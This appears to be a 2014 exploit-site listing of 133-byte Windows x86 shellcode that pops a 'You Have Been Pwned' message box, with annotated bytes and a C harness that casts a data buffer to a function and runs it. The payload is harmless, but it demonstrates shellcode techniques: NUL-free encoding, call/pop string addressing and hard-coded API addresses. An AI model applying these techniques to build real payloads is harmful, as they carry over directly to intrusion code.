
Windows10 MessageBox Shellcode - (133 Bytes)

Author: Ghosty , Published: 26-11-2014
/*
▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ▄██ ▄
███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ███ ██▄
███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ███▄▄▄███
▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ▀▀▀▀▀▀███
▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ ▄██ ███
███ ███ ███ ███ ███ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ███ ▄█ ███ ███ ███ ███
████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ ▀█████▀
###
# Title : Windows10 MessageBox Shellcode - (133 Bytes)
# Author : Ghosty
# E-mail : x31337666@gmail.com
# Home : Hydra (16040) - Algeria -(00551216458)
# Web Site : 127.0.0.1
# FaCeb0ok : http://fb.me/0x9h027
# Friendly Sites : www.exploit4arab.net * www.1337day.com
# Platform/CatID : Shellcode - Local - Win32
# Type : Shellcode - proof of concept - Windows
# Tested on : Windows10 Technical Preview
###
*/
#include <stdio.h>
#include <string.h>
/*
 * msg: 133 bytes of 32-bit x86 machine code followed by three inline ASCII
 * strings, stored as one string literal (the compiler appends a trailing NUL).
 *
 * Layout (offsets from the start of msg):
 *   0x00-0x40  code
 *   0x41       call 0x0a, followed by "user32.dllN"
 *   0x51       call 0x18, followed by "MessageBoxAN"
 *   0x62       call 0x29, followed by "You Have Been Pwned By GhostyN"
 *
 * Each trailing call pushes the address of the string that follows it and
 * jumps back into the code, where a pop %ecx picks that address up. The final
 * 'N' of every string is a placeholder that the code overwrites with a zero
 * byte at run time, so the literal itself contains no 0x00 bytes.
 *
 * The three call targets (0x76c20b30, 0x76c1f030, 0x76c2db80) are absolute
 * addresses baked into the bytes. They only mean something in the exact
 * process image the author tested; with ASLR or any other DLL build they
 * point at unrelated memory.
 * NOTE(review): judging by the arguments pushed, these look like
 * LoadLibraryA, GetProcAddress and a process-exit routine. The page does not
 * name them, so confirm before relying on that reading.
 *
 * The original listing disassembled the string bytes as if they were
 * instructions; they are annotated as data below. The displacement in the
 * comment for "\x88\x51\x1d" is corrected to 0x1d to match the byte.
 */
char msg[] =
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\x31\xd2" // xor %edx,%edx  (edx = 0, used as the zero source below)
"\xeb\x37" // jmp 401041 <_start+0x41>  (to the call that precedes "user32.dllN")
"\x59" // pop %ecx  (ecx = address of "user32.dllN")
"\x88\x51\x0a" // mov %dl,0xa(%ecx)  (zero byte over the 'N' at index 10)
"\xbb\x30\x0b\xc2\x76" // mov $0x76c20b30,%ebx  (hard-coded absolute address; presumably LoadLibraryA, confirm)
"\x51" // push %ecx  (single argument: the string pointer)
"\xff\xd3" // call *%ebx
"\xeb\x39" // jmp 401051 <_start+0x51>  (to the call that precedes "MessageBoxAN")
"\x59" // pop %ecx  (ecx = address of "MessageBoxAN")
"\x31\xd2" // xor %edx,%edx
"\x88\x51\x0b" // mov %dl,0xb(%ecx)  (zero byte over the 'N' at index 11)
"\x51" // push %ecx  (second argument: the name string)
"\x50" // push %eax  (first argument: return value of the previous call)
"\xbb\x30\xf0\xc1\x76" // mov $0x76c1f030,%ebx  (hard-coded absolute address; presumably GetProcAddress, confirm)
"\xff\xd3" // call *%ebx
"\xeb\x39" // jmp 401062 <_start+0x62>  (to the call that precedes the message text)
"\x59" // pop %ecx  (ecx = address of the message text)
"\x31\xd2" // xor %edx,%edx
"\x88\x51\x1d" // mov %dl,0x1d(%ecx)  (zero byte over the 'N' at index 29)
"\x31\xd2" // xor %edx,%edx
"\x52" // push %edx  (0)
"\x51" // push %ecx  (message text)
"\x51" // push %ecx  (same pointer again)
"\x52" // push %edx  (0)
"\xff\xd0" // call *%eax  (eax = return value of the second call; four arguments: 0, text, text, 0)
"\x31\xd2" // xor %edx,%edx
"\x50" // push %eax  (return value of the previous call, passed as the argument)
"\xb8\x80\xdb\xc2\x76" // mov $0x76c2db80,%eax  (hard-coded absolute address; presumably an exit routine, confirm)
"\xff\xd0" // call *%eax
"\xe8\xc4\xff\xff\xff" // call 40100a <_start+0xa>  (pushes the address of the next byte)
"\x75\x73" // data: "us"
"\x65" // data: "e"
"\x72\x33" // data: "r3"
"\x32\x2e" // data: "2."
"\x64" // data: "d"
"\x6c" // data: "l"
"\x6c" // data: "l"
"\x4e" // data: "N"  (placeholder, replaced by 0x00 at run time)
"\xe8\xc2\xff\xff\xff" // call 401018 <_start+0x18>  (pushes the address of the next byte)
"\x4d" // data: "M"
"\x65" // data: "e"
"\x73\x73" // data: "ss"
"\x61" // data: "a"
"\x67" // data: "g"
"\x65" // data: "e"
"\x42" // data: "B"
"\x6f" // data: "o"
"\x78\x41" // data: "xA"
"\x4e" // data: "N"  (placeholder, replaced by 0x00 at run time)
"\xe8\xc2\xff\xff\xff" // call 401029 <_start+0x29>  (pushes the address of the next byte)
"\x59" // data: "Y"
"\x6f" // data: "o"
"\x75\x20" // data: "u "
"\x48" // data: "H"
"\x61" // data: "a"
"\x76\x65" // data: "ve"
"\x20\x42\x65" // data: " Be"
"\x65\x6e" // data: "en"
"\x20\x50\x77" // data: " Pw"
"\x6e" // data: "n"
"\x65\x64\x20\x42\x79" // data: "ed By"
"\x20\x47\x68" // data: " Gh"
"\x6f" // data: "o"
"\x73\x74" // data: "st"
"\x79\x4e"; // data: "yN"  ('N' is the placeholder, replaced by 0x00 at run time)
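/*
 * Test harness: print the payload length, then call into the msg array.
 *
 * strlen() stops at the first zero byte. The listing above contains no 0x00
 * bytes, so the value printed is the full payload length (133).
 *
 * msg is an ordinary initialised char array, so it sits in a data section.
 * Where DEP/NX is enforced for the process, the indirect call below raises
 * an access violation instead of running the bytes. Converting an object
 * pointer to a function pointer is also outside what ISO C defines.
 *
 * Returns 0 if control ever comes back from the payload.
 */
int main(void)
{
	int (*dz)() = (int(*)())msg;

	/* strlen() returns size_t; cast so the argument matches %u exactly. */
	printf("bytes: %u\n", (unsigned)strlen(msg));
	dz();
	return 0;
}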
/*================[ ShellCode By Ghosty * 1337dayAlgeria Community * ]=========================================
# Greetz To 1337dayAlgeria Community +> TrOoN, Caddy, KedAnz, Indoushkha, Chevr0sky, Kha&miX, KinG Of PiraTeS
# Greetz To Inj3ct0r Members 31337 +> KedAns * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * Angel Injection
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs
#=============================================================================================================*/
